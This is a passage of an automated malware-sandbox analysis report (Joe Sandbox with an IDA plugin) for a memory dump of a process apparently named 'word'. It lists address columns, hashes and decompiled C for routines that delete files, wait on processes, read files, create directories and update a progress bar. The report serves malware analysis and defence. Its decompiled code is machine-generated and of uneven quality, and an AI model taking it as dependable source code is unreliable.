                                    0x00406e63
                                    0x00406e7f
                                    0x00406e82
                                    0x00406e85
                                    0x00406e88
                                    0x00406e8f
                                    0x00406e93
                                    0x00406e95
                                    0x00406e99
                                    0x00406e65
                                    0x00406e65
                                    0x00406e69
                                    0x00406e71
                                    0x00406e76
                                    0x00406e78
                                    0x00406e7a
                                    0x00406e7a
                                    0x00406e9c
                                    0x00406ea3
                                    0x00406ea6
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eb1
                                    0x00406eb1
                                    0x00406eb5
                                    0x00407575
                                    0x00000000
                                    0x00407575
                                    0x00406ebb
                                    0x00406ebe
                                    0x00406ec1
                                    0x00406ec5
                                    0x00406ec8
                                    0x00406ece
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed3
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406edc
                                    0x00000000
                                    0x00000000
                                    0x00406ede
                                    0x00406ee1
                                    0x00406ee4
                                    0x00406ee7
                                    0x00406eea
                                    0x00406eed
                                    0x00406ef0
                                    0x00406ef3
                                    0x00406ef6
                                    0x00406ef9
                                    0x00406efc
                                    0x00406f14
                                    0x00406f17
                                    0x00406f1a
                                    0x00406f1d
                                    0x00406f1d
                                    0x00406f20
                                    0x00406f24
                                    0x00406f26
                                    0x00406efe
                                    0x00406efe
                                    0x00406f06
                                    0x00406f0b
                                    0x00406f0d
                                    0x00406f0f
                                    0x00406f0f
                                    0x00406f29
                                    0x00406f30
                                    0x00406f33
                                    0x00000000
                                    0x00406f35
                                    0x00000000
                                    0x00406f35
                                    0x00406f33
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00000000
                                    0x00000000
                                    0x00406f75
                                    0x00406f75
                                    0x00406f79
                                    0x00407581
                                    0x00000000
                                    0x00407581
                                    0x00406f7f
                                    0x00406f82
                                    0x00406f85
                                    0x00406f89
                                    0x00406f8c
                                    0x00406f92
                                    0x00406f94
                                    0x00406f94
                                    0x00406f94
                                    0x00406f97
                                    0x00406f9a
                                    0x00406f9a
                                    0x00406fa0
                                    0x00406f3e
                                    0x00406f3e
                                    0x00406f41
                                    0x00000000
                                    0x00406f41
                                    0x00406fa2
                                    0x00406fa2
                                    0x00406fa5
                                    0x00406fa8
                                    0x00406fab
                                    0x00406fae
                                    0x00406fb1
                                    0x00406fb4
                                    0x00406fb7
                                    0x00406fba
                                    0x00406fbd
                                    0x00406fc0
                                    0x00406fd8
                                    0x00406fdb
                                    0x00406fde
                                    0x00406fe1
                                    0x00406fe1
                                    0x00406fe4
                                    0x00406fe8
                                    0x00406fea
                                    0x00406fc2
                                    0x00406fc2
                                    0x00406fca
                                    0x00406fcf
                                    0x00406fd1
                                    0x00406fd3
                                    0x00406fd3
                                    0x00406fed
                                    0x00406ff4
                                    0x00406ff7
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00407286
                                    0x00407286
                                    0x0040728a
                                    0x004075b1
                                    0x00000000
                                    0x004075b1
                                    0x00407290
                                    0x00407293
                                    0x00407296
                                    0x0040729a
                                    0x0040729d
                                    0x004072a3
                                    0x004072a5
                                    0x004072a5
                                    0x004072a5
                                    0x004072a8
                                    0x00000000
                                    0x00000000
                                    0x00407056
                                    0x00407056
                                    0x00407059
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x00000000
                                    0x00407395
                                    0x00407399
                                    0x004073bb
                                    0x004073be
                                    0x004073c8
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x004073cb
                                    0x0040739b
                                    0x0040739e
                                    0x004073a2
                                    0x004073a5
                                    0x004073a5
                                    0x004073a8
                                    0x00000000
                                    0x00000000
                                    0x00407452
                                    0x00407456
                                    0x00407474
                                    0x00407474
                                    0x00407474
                                    0x0040747b
                                    0x00407482
                                    0x00407489
                                    0x00407489
                                    0x00000000
                                    0x00407489
                                    0x00407458
                                    0x0040745b
                                    0x0040745e
                                    0x00407461
                                    0x00407468
                                    0x004073ac
                                    0x004073ac
                                    0x004073af
                                    0x00000000
                                    0x00000000
                                    0x00407543
                                    0x00407546
                                    0x00407447
                                    0x00000000
                                    0x00000000
                                    0x0040717d
                                    0x0040717f
                                    0x00407186
                                    0x00407187
                                    0x00407189
                                    0x0040718c
                                    0x00000000
                                    0x00000000
                                    0x00407194
                                    0x00407197
                                    0x0040719a
                                    0x0040719c
                                    0x0040719e
                                    0x0040719e
                                    0x0040719f
                                    0x004071a2
                                    0x004071a9
                                    0x004071ac
                                    0x004071ba
                                    0x00000000
                                    0x00000000
                                    0x00407490
                                    0x00407490
                                    0x00407493
                                    0x0040749a
                                    0x00000000
                                    0x00000000
                                    0x0040749f
                                    0x0040749f
                                    0x004074a3
                                    0x004075db
                                    0x00000000
                                    0x004075db
                                    0x004074a9
                                    0x004074ac
                                    0x004074af
                                    0x004074b3
                                    0x004074b6
                                    0x004074bc
                                    0x004074be
                                    0x004074be
                                    0x004074be
                                    0x004074c1
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c7
                                    0x004074c7
                                    0x004074cb
                                    0x0040752b
                                    0x0040752e
                                    0x00407533
                                    0x00407534
                                    0x00407536
                                    0x00407538
                                    0x0040753b
                                    0x00407447
                                    0x00407447
                                    0x00000000
                                    0x0040744d
                                    0x00407447
                                    0x004074cd
                                    0x004074d3
                                    0x004074d6
                                    0x004074d9
                                    0x004074dc
                                    0x004074df
                                    0x004074e2
                                    0x004074e5
                                    0x004074e8
                                    0x004074eb
                                    0x004074ee
                                    0x00407507
                                    0x0040750a
                                    0x0040750d
                                    0x00407510
                                    0x00407514
                                    0x00407516
                                    0x00407516
                                    0x00407517
                                    0x0040751a
                                    0x004074f0
                                    0x004074f0
                                    0x004074f8
                                    0x004074fd
                                    0x004074ff
                                    0x00407502
                                    0x00407502
                                    0x0040751d
                                    0x00407524
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x004071c2
                                    0x004071c5
                                    0x004071fb
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732e
                                    0x0040732e
                                    0x00407331
                                    0x00407333
                                    0x004075bd
                                    0x00000000
                                    0x004075bd
                                    0x00407339
                                    0x0040733c
                                    0x00000000
                                    0x00000000
                                    0x00407342
                                    0x00407346
                                    0x00407349
                                    0x00407349
                                    0x00407349
                                    0x00000000
                                    0x00407349
                                    0x004071c7
                                    0x004071c9
                                    0x004071cb
                                    0x004071cd
                                    0x004071d0
                                    0x004071d1
                                    0x004071d3
                                    0x004071d5
                                    0x004071d8
                                    0x004071db
                                    0x004071f1
                                    0x004071f6
                                    0x0040722e
                                    0x0040722e
                                    0x00407232
                                    0x0040725e
                                    0x00407260
                                    0x00407267
                                    0x0040726a
                                    0x0040726d
                                    0x0040726d
                                    0x00407272
                                    0x00407272
                                    0x00407274
                                    0x00407277
                                    0x0040727e
                                    0x00407281
                                    0x004072ae
                                    0x004072ae
                                    0x004072b1
                                    0x004072b4
                                    0x00407328
                                    0x00407328
                                    0x00407328
                                    0x00000000
                                    0x00407328
                                    0x004072b6
                                    0x004072bc
                                    0x004072bf
                                    0x004072c2
                                    0x004072c5
                                    0x004072c8
                                    0x004072cb
                                    0x004072ce
                                    0x004072d1
                                    0x004072d4
                                    0x004072d7
                                    0x004072f0
                                    0x004072f2
                                    0x004072f5
                                    0x004072f6
                                    0x004072f9
                                    0x004072fb
                                    0x004072fe
                                    0x00407300
                                    0x00407302
                                    0x00407305
                                    0x00407307
                                    0x0040730a
                                    0x0040730e
                                    0x00407310
                                    0x00407310
                                    0x00407311
                                    0x00407314
                                    0x00407317
                                    0x004072d9
                                    0x004072d9
                                    0x004072e1
                                    0x004072e6
                                    0x004072e8
                                    0x004072eb
                                    0x004072eb
                                    0x0040731a
                                    0x00407321
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x00000000
                                    0x00407323
                                    0x00000000
                                    0x00407323
                                    0x00407321
                                    0x00407234
                                    0x00407237
                                    0x00407239
                                    0x0040723c
                                    0x0040723f
                                    0x00407242
                                    0x00407244
                                    0x00407247
                                    0x0040724a
                                    0x0040724a
                                    0x0040724d
                                    0x0040724d
                                    0x00407250
                                    0x00407257
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x00000000
                                    0x00407259
                                    0x00000000
                                    0x00407259
                                    0x00407257
                                    0x004071dd
                                    0x004071e0
                                    0x004071e2
                                    0x004071e5
                                    0x00000000
                                    0x00000000
                                    0x00406f44
                                    0x00406f44
                                    0x00406f48
                                    0x0040758d
                                    0x00000000
                                    0x0040758d
                                    0x00406f4e
                                    0x00406f51
                                    0x00406f54
                                    0x00406f57
                                    0x00406f5a
                                    0x00406f5d
                                    0x00406f60
                                    0x00406f62
                                    0x00406f65
                                    0x00406f68
                                    0x00406f6b
                                    0x00406f6d
                                    0x00406f6d
                                    0x00406f6d
                                    0x00000000
                                    0x00000000
                                    0x004070cf
                                    0x004070cf
                                    0x004070d3
                                    0x00407599
                                    0x00000000
                                    0x00407599
                                    0x004070d9
                                    0x004070dc
                                    0x004070df
                                    0x004070e2
                                    0x004070e4
                                    0x004070e4
                                    0x004070e4
                                    0x004070e7
                                    0x004070ea
                                    0x004070ed
                                    0x004070f0
                                    0x004070f3
                                    0x004070f6
                                    0x004070f7
                                    0x004070f9
                                    0x004070f9
                                    0x004070f9
                                    0x004070fc
                                    0x004070ff
                                    0x00407102
                                    0x00407105
                                    0x00407105
                                    0x00407105
                                    0x00407108
                                    0x0040710a
                                    0x0040710a
                                    0x00000000
                                    0x00000000
                                    0x0040734c
                                    0x0040734c
                                    0x0040734c
                                    0x00407350
                                    0x00000000
                                    0x00000000
                                    0x00407356
                                    0x00407359
                                    0x0040735c
                                    0x0040735f
                                    0x00407361
                                    0x00407361
                                    0x00407361
                                    0x00407364
                                    0x00407367
                                    0x0040736a
                                    0x0040736d
                                    0x00407370
                                    0x00407373
                                    0x00407374
                                    0x00407376
                                    0x00407376
                                    0x00407376
                                    0x00407379
                                    0x0040737c
                                    0x0040737f
                                    0x00407382
                                    0x00407385
                                    0x00407389
                                    0x0040738b
                                    0x0040738e
                                    0x00000000
                                    0x00407390
                                    0x0040710d
                                    0x0040710d
                                    0x00000000
                                    0x0040710d
                                    0x0040738e
                                    0x004075c3
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x004075fa
                                    0x004075fa
                                    0x00000000
                                    0x004075fa
                                    0x00407447
                                    0x004073ce
                                    0x004073cb

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                    • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                    • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                    • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                    0x00405d2d
                                    0x00405d38
                                    0x00405d3d
                                    0x00405d6d
                                    0x00000000
                                    0x00405d6d
                                    0x00405d44
                                    0x00405d45
                                    0x00405d4f
                                    0x00405d47
                                    0x00405d47
                                    0x00405d47
                                    0x00405d57
                                    0x00405d63
                                    0x00405d67
                                    0x00405d67
                                    0x00000000
                                    0x00405d59
                                    0x00000000
                                    0x00405d5b

                                    APIs
                                      • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                      • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                    • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                    • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: File$Attributes$DeleteDirectoryRemove
                                    • String ID:
                                    • API String ID: 1655745494-0
                                    • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                    • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                    • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                    • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                    0x00406af1
                                    0x00406b08
                                    0x00406afc
                                    0x00406b06
                                    0x00406b06
                                    0x00406b13
                                    0x00406b1f

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                    • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B13
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: ObjectSingleWait$CodeExitProcess
                                    • String ID:
                                    • API String ID: 2567322000-0
                                    • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                    • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                    • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                    • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004061DB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                    0x004061df
                                    0x004061ef
                                    0x004061f7
                                    0x00000000
                                    0x004061fe
                                    0x00000000
                                    0x00406200

                                    APIs
                                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 004061EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: 248058040134
                                    • API String ID: 2738559852-1212554544
                                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                    • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                    • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                    0x004015c1
                                    0x004015c9
                                    0x004015cc
                                    0x004015d1
                                    0x004015d5
                                    0x004015d7
                                    0x004015df
                                    0x004015e1
                                    0x004015e4
                                    0x004015ea
                                    0x00401604
                                    0x00401607
                                    0x004015ec
                                    0x004015ec
                                    0x004015ef
                                    0x00000000
                                    0x004015fa
                                    0x004015fd
                                    0x004015fd
                                    0x004015ef
                                    0x0040160e
                                    0x00401615
                                    0x00401624
                                    0x00401624
                                    0x00401617
                                    0x0040161a
                                    0x00401622
                                    0x00000000
                                    0x00000000
                                    0x00401622
                                    0x00401615
                                    0x00401627
                                    0x0040162b
                                    0x0040162c
                                    0x004015d7
                                    0x00401634
                                    0x00401663
                                    0x004022f1
                                    0x00401636
                                    0x00401638
                                    0x00401645
                                    0x0040164d
                                    0x00401655
                                    0x0040165b
                                    0x0040165b
                                    0x00401655
                                    0x00402c2d
                                    0x00402c39

                                    APIs
                                      • Part of subcall function 00405FE2: CharNextW.USER32(?), ref: 00405FF0
                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                      • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                    • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                    • String ID:
                                    • API String ID: 1892508949-0
                                    • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                    • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                    • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                    • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                    0x0040138a
                                    0x004013fa
                                    0x0040139b
                                    0x004013a0
                                    0x00000000
                                    0x00000000
                                    0x004013a2
                                    0x004013a3
                                    0x004013ad
                                    0x00000000
                                    0x00401404
                                    0x004013b0
                                    0x004013b7
                                    0x004013bd
                                    0x004013be
                                    0x004013c0
                                    0x004013c2
                                    0x004013b9
                                    0x004013b9
                                    0x004013ba
                                    0x004013ba
                                    0x004013c9
                                    0x004013cb
                                    0x004013f4
                                    0x004013f4
                                    0x004013c9
                                    0x00000000

                                    APIs
                                    • MulDiv.KERNEL32 ref: 004013E4
                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
